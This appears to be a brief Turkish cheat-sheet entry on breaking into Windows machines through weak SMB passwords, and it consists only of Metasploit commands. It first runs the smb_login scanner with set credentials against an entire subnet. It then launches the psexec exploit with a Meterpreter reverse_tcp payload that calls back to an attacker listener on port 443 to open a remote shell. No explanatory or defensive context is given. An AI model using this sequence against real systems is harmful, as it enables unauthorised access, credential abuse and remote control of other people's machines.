SMB
Zayıf SMB Parolası Sonucu Makineye Sızma
msf > use auxiliary/scanner/smb/smb_login msf > set RHOSTS 192.168.1.0/24 msf > set SMBUser victim msf > set SMBPass s3cr3t msf > set THREADS 50 msf > run
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.57.133
msf exploit(psexec) > set LPORT 443
msf exploit(psexec) > set RHOST 192.168.57.131
msf exploit(psexec) > set SMBPass xx:xx
msf exploit(psexec) > exploitLast updated